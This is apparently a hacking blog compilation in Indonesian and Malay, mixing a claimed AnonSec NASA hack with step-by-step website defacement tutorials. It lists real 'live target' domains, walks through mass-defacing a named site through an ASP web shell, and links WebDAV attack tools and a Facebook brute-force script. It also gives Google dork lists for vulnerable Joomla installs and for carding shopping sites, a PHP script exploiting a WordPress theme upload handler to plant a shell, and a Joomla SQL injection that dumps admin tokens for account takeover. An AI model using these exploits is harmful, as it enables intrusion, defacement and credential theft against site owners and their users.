Para hacker Anonsec telah meng-upload gambar yang menunjukkan,
bagaimana hacker men-download rekaman drone NASA dari server NASA.
Berikut FoTO - yang di upload oleh AnonSec
AnonSec Klaim Hacked NASA drones
Deface Dengan teknik Web-Folder di windows 7
- Persiapkan halaman Script defacement Anda, contoh :l hacked.html
- Buka window explorer
- Kemudian di dalam tampilan windows explorer klik kanan dan pilih Add a network Location
- Selanjutnya klik nekt Pada Internet or network addres, masukkan alamat website target Anda! misal target Anda adalah http://yourtarget.com/
- klik nekt dan tunggu sampai prosesnya selesai, lama tidaknya proses tergantung koneksi internetmu.
- Selanjutnya memberikan nama web folder tersebut, klik nekt saja langsung karena secara otomatis akan memberikan nama sesuai alamat website tsb.
- klik finish dan web folder tersebut akan muncul di windows explorer Anda.
- Langkah selanjutnya masukkan halaman defacement Anda yang sebelumnya sudah dipersiapkan, misal deface.html ke dalam web folder yang telah dibuat tadi. htm
- Untuk membuka hasil deface Anda tersebut tinggal menambahkan nama file defacement Anda dibelakang url website tsb. Misal: http://yourtarget.com/ menjadi http://yourtarget.com/deface.htm
Live target
zgsfjw.net
centro.anje.pt
www.ziangli.com
6.shicheng.gov.cn
www.ville-mordelles.fr
www.podiocom.com
www.journeezerotracas.fr
www.journeezerotracas.com
www.journee0tracas.com
www.comune.torrice.fr.it
www.chinamaster88.com
www.chateaudelepinay.fr
www.centroformazioneitalia.it
www.bjautoobd.com
www.autodiagtool.com
usa.automotormaster.com
so-sighty.fr
perros-guirec.icor.fr
myhealthcity.com
malaysiahealthcareindonesia.com
lapetitehublais.fr
handistar.fr
gz.autoobd-ii.com
gz.automotormaster.com
expert-comptable-35.fr
carrelages-palmieri.com
camion-road-show.com
autoobd.cn
hibis.co.id
Tutorial Deface Directory Folder dengan WebDav dan asp Shell IHCT
website yang saya gunkan ini adalah website thailand dan udah ane pakay webdav dan sudah tertanam asp Shell IHCT di dalem site nya kalo mau download asp shell IHCT Klik disini
untuk di dalam asp shell IHCT .. saya mengunakan satu website
http://www.ccamarketing.com/scripts/default.asp
lihat nii gambar . website tu ditulis sebagai : Ccmarketing
ok ... sekarang kita dah ada target ..
kalian masuk di dalam directory Ccmarketing .. ikut nama folder domain kalian sendiri .. untuk saya .. saya akan masuk folder macam dalam anak panah tu..
ok.. kita dah di dalam directory Ccmarketing
ok ... macam gambar dekat atas tu ..
bila luu dah masuk dekat dalam directory tu .. luu akan jumpa perkataan : Mass deface on : ??????
ok.. kita klik tu .. perkataan tu berada di bawah garis yang pertama selepas Test.. macam dalam gambar ni .. (bahasa lain)
Ok .. perkataan mass tu adalh untuk membuat pemeriksaan sama ada directory website tu boleh di deface ataupun tidak .. lu klik mass dulu .. kalau dah dia akan tertulis Done !
selepas tu .. bila dia done .. kita ke langkah yang seterusnya .. korang klik dekat Mass deface macam dalam anak panah dekat gambar atas tu
Brute: Test and Deface root and sub directories.
Single: Test and deface only root directories.
lihat perkataan tu ?? ok .. kita dah selesai ..
di dalam kotak tu .. kamu masukan script deface kalian dekat dalam tu ... tik pada kotak ROOT
ok .. Lepas tu kalian tekan : Deface All
Maka akan keluar macam ni
ok .. nampaknya directory yang sudah di Deface itu adala dalam directory prodimages .. macam dalam gambar di atas
ok .. link di atas tadi adalah
http://www.ccamarketing.com/scripts/default.asp
directory yang sudah di Deface tadi adalah **/prodimages
kita ambil link
http://www.ccamarketing.com/
tambahkan /prodimages dekat belakang link itu .. di situ directory yang sudah di deface
terpulang dengan directory yang kalian dah deface tu .. untuk Ccamarketing ini .. directory yang dah di deface adalah /prodimages ..
kalau yang sudah di deface tu pada directory yang lain .. luu letak la nama directory tu belakang domain tu .. untuk domain yang saya guna ni adalah /prodimages .. jadi saya perlu buat macam ini
http://www.ccamarketing.com/prodimages
ok .. copy link tu dah paste dekat address bar dan tekan enter
Deface saya berada di situ ..
ok .. jadi selamat mencuba ... Enjoy ..
peace ah !
untuk di dalam asp shell IHCT .. saya mengunakan satu website
http://www.ccamarketing.com/scripts/default.asp
lihat nii gambar . website tu ditulis sebagai : Ccmarketing
ok ... sekarang kita dah ada target ..
kalian masuk di dalam directory Ccmarketing .. ikut nama folder domain kalian sendiri .. untuk saya .. saya akan masuk folder macam dalam anak panah tu..
ok.. kita dah di dalam directory Ccmarketing
ok ... macam gambar dekat atas tu ..bila luu dah masuk dekat dalam directory tu .. luu akan jumpa perkataan : Mass deface on : ??????
ok.. kita klik tu .. perkataan tu berada di bawah garis yang pertama selepas Test.. macam dalam gambar ni .. (bahasa lain)
Ok .. perkataan mass tu adalh untuk membuat pemeriksaan sama ada directory website tu boleh di deface ataupun tidak .. lu klik mass dulu .. kalau dah dia akan tertulis Done !selepas tu .. bila dia done .. kita ke langkah yang seterusnya .. korang klik dekat Mass deface macam dalam anak panah dekat gambar atas tu
Brute: Test and Deface root and sub directories.Single: Test and deface only root directories.
lihat perkataan tu ?? ok .. kita dah selesai ..
di dalam kotak tu .. kamu masukan script deface kalian dekat dalam tu ... tik pada kotak ROOT
ok .. Lepas tu kalian tekan : Deface All
Maka akan keluar macam ni
ok .. nampaknya directory yang sudah di Deface itu adala dalam directory prodimages .. macam dalam gambar di atas
ok .. link di atas tadi adalah
http://www.ccamarketing.com/scripts/default.asp
directory yang sudah di Deface tadi adalah **/prodimages
kita ambil link
http://www.ccamarketing.com/
tambahkan /prodimages dekat belakang link itu .. di situ directory yang sudah di deface
terpulang dengan directory yang kalian dah deface tu .. untuk Ccamarketing ini .. directory yang dah di deface adalah /prodimages ..
kalau yang sudah di deface tu pada directory yang lain .. luu letak la nama directory tu belakang domain tu .. untuk domain yang saya guna ni adalah /prodimages .. jadi saya perlu buat macam ini
http://www.ccamarketing.com/prodimages
ok .. copy link tu dah paste dekat address bar dan tekan enter
Deface saya berada di situ ..
ok .. jadi selamat mencuba ... Enjoy ..
peace ah !
Tutorial Upload shell.php.jpg Dengan TAMPER DATA
Kalo anda masih bingung dengan Post yang sebelumnya kami upload di : Cara Upload file ( PHP ) dengan tamper data Kali ini kita akan share vidio nya di post ini , langsung saja nonton dibawah ini
Deface website dengan WebDav Vuln(erable) Attacker ++
WebDav Vuln(erable) Attacker ++ by BeKaBe F. Adalah perangkat sederhana untuk mengHack atau Deface website yang menggunakan server Webdav atau IIS yang tidak kebal
Dengan perangkat ini, Anda dapat memposting skrip ASP (shell ASP, misalnya) atau mengupload file, bisa file teks; gambar; aplikasi, apa pun, terserah Anda
Namun pada beberapa server Webdav, Anda tidak diizinkan mengupload file ASPanda bisa hapus index dan mass deface dengan teknik jumping shell asp
Download http://www.tusfiles.net/rga8wuek3pdr
or
Download: http://riyanhidayatsamosir.com/files/WebDav++.zip
or
Download http://www.4shared.com/zip/pzvuxOf9ce/WebDav.html
Cara menggunakan Tools nya mudah , cukup seperti webdav by hmei7 biasa
Bypass Facebook Security 100%
Bypas Facebook Security 100%Script Bruteforce MULTI account facebook [PHP] : http://pastebin.com/xYX8HSXR
Gak Perlu panjang lebar , langsung aja tonton dibawah ini
Google Dork Com_User New
Sudah bosen dengan dork com_users anda dan jarang sekali
bnyak web.vuln nih ada yang baru
DORK :
Quote:intext:Usar un nombre de usuario y contraseña válido para poder tener acceso a la Administración.. Joomla!® es software libre distribuido bajo la licencia GNU/GPL. Pack creado por Joomla!Spanish - 2011 - Hosting Joomla Spanish Webempresa
Quote:intitle:home page beez joomla 1.6 inurl:com/joomla
Quote:intitle:home page beez 2 inurl:com/joomla
Quote:intitle:home page beez 5 inurl:com/joomla
Quote:intitle:home page atomic inurl:com/joomla
Quote:intext:Joomla!® - бесплатное программное обеспечение, распространяемое по лицензии GNU General Public License
Локализация: Портал Joomla! по-русски. Техническая поддержка: Форум русской поддержки Joomla! CMS inurl:/administrator
Quote:intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it
Quote:intext:Введите существующие логин и пароль доступа к Панели управления. site:ru
Quote:inurl:/administrator/index.php intext:Use a valid username and password to gain access to the administrator backend. Joomla!® is free software released under the GNU General Public License.
Quote:intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
Quote:inurl:index.php/using-joomla/extensions/components/users-component/registration-form
Quote:inurl:index.php/using-joomla/extensions/plugins site:.com
Quote:inurl:index.php/using/joomla site:com
Quote:inurl:index.php/using-joomla/extensions/components/content-component/article-category-list/50-upgraders
Quote:inurl:index.php/using-joomla/extensions/components/content-component/article-categories/28-park-site/photo-gallery
Quote:inurl:index.php/using-joomla/parameters/26-sample-data-articles/park-site
Quote:Inurl:index.php/plugins site:com
Quote:Inurl:index.php/rss=feed site:com
Quote:inurl:index.php/joomla/content/category-blog/24-joomla site:com
Quote:inurl:index.php/using-joomla/extensions/components/content-component/article-categories/84-gd-articles site:.com
Quote:inurl:Home Page Beez joomla 1.6 index.php using-joomla
Quote:inurl:index.php joomla! 1.7 - open source content management site:com
Quote:inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
Quote:intext:joomla! 1.7 - open source content management site:jp
Quote:inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:.com
Quote:inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
Quote:inurl:index.php/19-sample-data-articles/joomla site:com
Quote:inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:com
Quote:intext:"joomla! 1.7 - Open Source Content Management" inurl:sites-guide.co.vn
Quote:intext:"joomla! 1.7 - Open Source Content Management" inurl:statscrop+gov
Quote:intext:"joomla! 1.6 - Open Source Content Management" inurl:statscrop+gov
Quote:intext:"joomla! 1.7 - Open Source Content Management" inurl:statmyweb+gov
Quote:intext:"joomla! 1.6 - Open Source Content Management" inurl:statmyweb+gov
Quote:intext:"joomla! 1.6 - Open Source Content Management" inurl:gov rank
Quote:intext:Joomla! is the mobile-ready and user-friendly way to build your website. Choose from thousands of features and designs. Joomla! is free and open source.
Quote:intext:The Joomla! name is used under a limited license from Open Source Matters in the United States and other countries.JoomlaShine.com is not affiliated with or endorsed by Open Source Matters or the Joomla! Project.
Quote:intext:Joomla! 1.7Â continues development of the Joomla Framework and CMS as a powerful and flexible way to bring your vision of the web to reality
Quote:intext:Joomla! Spanish.Gestor de Contenido Open Source 2.5 inurl:com/joomla
Dork Carding Terbaru
inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"
inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"
inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"
inurl:".php?categoryid="
inurl:".php?categoryid=" intext:"View cart"
inurl:".php?categoryid=" intext:"Buy Now"
inurl:".php?categoryid=" intext:"add to cart"
inurl:".php?categoryid=" intext:"shopping"
inurl:".php?categoryid=" intext:"boutique"
inurl:".php?categoryid=" intext:"/store/"
inurl:".php?categoryid=" intext:"/shop/"
inurl:".php?categoryid=" intext:"Toys"
inurl:".php?pid="
inurl:".php?pid=" intext:"shopping"
inurl:".php?pid=" intext:"add to cart"
inurl:".php?pid=" intext:"Buy Now"
inurl:".php?pid=" intext:"View cart"
inurl:".php?pid=" intext:"boutique"
inurl:".php?pid=" intext:"/store/"
inurl:".php?pid=" intext:"/shop/"
inurl:".php?pid=" intext:"toys"
inurl:".php?prodid=
inurl:".php?prodid=" intext:"shopping"
inurl:".php?prodid=" intext:"add to cart"
inurl:".php?prodid=" intext:"Buy Now"
inurl:".php?prodid=" intext:"View cart"
inurl:".php?prodid=" intext:"boutique"
inurl:".php?prodid=" intext:"/store/"
inurl:".php?prodid=" intext:"/shop/"
inurl:".php?prodid=" intext:"toys"
inurl:".php?productid='
inurl:".php?productid=" intext:"shopping"
inurl:".php?productid=" intext:"add to cart"
inurl:".php?productid=" intext:"Buy Now"
inurl:".php?productid=" intext:"View cart"
inurl:".php?productid=" intext:"boutique"
inurl:".php?productid=" intext:"/store/"
inurl:".php?productid=" intext:"/shop/"
inurl:".php?productid=" intext:"Toys"
inurl:".php?product="
inurl:".php?product=" intext:"shopping"
inurl:".php?product=" intext:"add to cart"
inurl:".php?product=" intext:"Buy Now"
inurl:".php?product=" intext:"View cart"
inurl:".php?product=" intext:"boutique"
inurl:".php?product=" intext:"/store/"
inurl:".php?product=" intext:"/shop/"
inurl:".php?product=" intext:"toys"
inurl:".php?product=" intext:"DVD"
inurl:".php?products="
inurl:".php?products=" intext:"shopping"
inurl:".php?products=" intext:"add to cart"
inurl:".php?products=" intext:"Buy Now"
inurl:".php?products=" intext:"View cart"
inurl:".php?products=" intext:"boutique"
inurl:".php?products=" intext:"/store/"
inurl:".php?products=" intext:"/shop/"
inurl:".php?products=" intext:"toys"
inurl:".php?products=" intext:"DVD"
inurl:".php?proid="
inurl:".php?proid=" intext:"shopping"
inurl:".php?proid=" intext:"add to cart"
inurl:".php?proid=" intext:"Buy Now"
inurl:".php?proid=" intext:"View cart"
inurl:".php?proid=" intext:"boutique"
inurl:".php?proid=" intext:"/store/"
inurl:".php?proid=" intext:"/shop/"
inurl:".php?proid=" intext:"toys"
inurl:".php?shopid="
inurl:".php?shopid=" intext:"shopping"
inurl:".php?shopid=" intext:"add to cart"
inurl:".php?shopid=" intext:"Buy Now"
inurl:".php?shopid=" intext:"View cart"
inurl:".php?shopid=" intext:"boutique"
inurl:".php?shopid=" intext:"/store/"
inurl:".php?shopid=" intext:"/shop/"
inurl:".php?shopid=" intext:"Toys"
inurl:".php?itemid="
inurl:".php?itemid=" intext:"shopping"
inurl:".php?itemid=" intext:"add to cart"
inurl:".php?itemid=" intext:"Buy Now"
inurl:".php?itemid=" intext:"View cart"
inurl:".php?itemid=" intext:"boutique"
inurl:".php?itemid=" intext:"/shop/"
inurl:".php?itemid=" intext:"/store/"
inurl:".php?itemid=" intext:"Toys"
inurl:".php?orderid="
inurl:".php?orderid=" intext:"shopping"
inurl:".php?orderid=" intext:"add to cart"
inurl:".php?orderid=" intext:"Buy Now"
inurl:".php?orderid=" intext:"View cart"
inurl:".php?orderid=" intext:"boutique"
inurl:".php?orderid=" intext:"/shop/"
inurl:".php?orderid=" intext:"/store/"
inurl:".php?orderid=" intext:"Toys"
inurl:".php?catalogId="
inurl:".php?catalogId=" intext:"shopping"
inurl:".php?catalogId=" intext:"add to cart"
inurl:".php?catalogId=" intext:"Buy Now"
inurl:".php?catalogId=" intext:"View cart"
inurl:".php?catalogId=" intext:"boutique"
inurl:".php?catalogId=" intext:"/shop/"
inurl:".php?catalogId=" intext:"/store/"
inurl:".php?catalogId=" intext:"Toys"
inurl:".php?aid="
inurl:".php?aid=" intext:"shopping"
inurl:".php?aid=" intext:"add to cart"
inurl:".php?aid=" intext:"Buy Now"
inurl:".php?aid=" intext:"View cart"
inurl:".php?aid=" intext:"boutique"
inurl:".php?aid=" intext:"/shop/"
inurl:".php?aid=" intext:"/store/"
inurl:".php?aid=" intext:"toys"
inurl:".php?artid="
inurl:".php?artid=" intext:"shopping"
inurl:".php?artid=" intext:"add to cart"
inurl:".php?artid=" intext:"Buy Now"
inurl:".php?artid=" intext:"View cart"
inurl:".php?artid=" intext:"boutique"
inurl:".php?artid=" intext:"/shop/"
inurl:".php?artid=" intext:"/store/"
inurl:".php?artid=" intext:"toys"
inurl:".php?articleid="
inurl:".php?articleid=" intext:"shopping"
inurl:".php?articleid=" intext:"add to cart"
inurl:".php?articleid=" intext:"Buy Now"
inurl:".php?articleid=" intext:"View cart"
inurl:".php?articleid=" intext:"boutique"
inurl:".php?articleid=" intext:"/shop/"
inurl:".php?articleid=" intext:"/store/"
inurl:".php?articleid=" intext:"toys"
Cara Deface Dengan Exploit Orang Themes File Upload
Exploit orange themes File Upload
Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell
Langkah-Langkah:
1).Search Di Google Gunakan Dork
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"
3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln
4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D
<?php
$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
5).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D
6).Aktifkan XAMPP Klik Start Pada Apache
7).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
8).Ketik cd\xampp/php
9)ketik php namascript.php Contoh: php lol.php
10).Jika Succes Akan Ada Nama Shellnya :D
11).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php
Deface Tutorial exploit joomla com_artforms
1. Ketik dork ini ke google : inurl:"option com_artforms"
2. Pilih salah 1 web untuk dijadikan target
3. Masukkan exploit ini : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
Contoh : www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
4. Nanti anda akan melihat email dari web tersebut. Copy email tersebut ke notepad.
5. Sekarang anda masuk ke tempat reset password dengan buka tab baru, lalu masukkan kode ini /index.php?option=com_user&view=reset
Contoh : www.site.com/index.php?option=com_user&view=reset
6. Sebelum reset password, anda akan disuruh memasukkan email. Nah, masukkan email yang tadi anda copy ke notepad. Lalu klik "submit"
7. Selanjutnya, anda akan disuruh memasukkan token. Nah anda buka tab baru dan masukkan exploit ini : index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
Contoh :www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
8. Nanti akan muncul kode aktivasi/token seperti ini admin eda7d6142fac40a533b56407a4617371. Yang berwarna merah adalah username webnya, sedangkan yang kuning adalah tokennya. Anda masukkan token tersebut pada form memasukkan token yang tadi. Klik enter.
9. Kini form untuk mereset password sudah muncul, nah masukkan password yang anda inginkan untuk masuk ke web tersebut sebagai admin. Misal : Dr.1n73ct10n
10. Jika berhasil, anda masuk deh ke panel adminnya : www.site.com/administrator
11. Masukkan username yang tadi ditemukan dan password yang sudah anda reset.
Contoh : username = admin, password = Dr.1n73ct10n
12. Dan kini anda berhasil masuk sebagai admin. Saatnya mulai menanam shell anda
Tutorial Shell Uploader web Lokomedia
[-] SHELL UPLOADER web Lokomedia [+]
Dork : allinurl:media.php?module=be
Dork : allinurl:media.php?module=be
Pilih suatu web yang menurut anda bisa di deface dengan lokomedia
- http://www.target.com/admin/
Langsung ganti url web target nya menjadi seperti berikut :
http://www.target.com/admin/
Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :
./
Kemudian ganti dengan
http://www.target.com/admin/
Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :
http://www.target.com/admin/
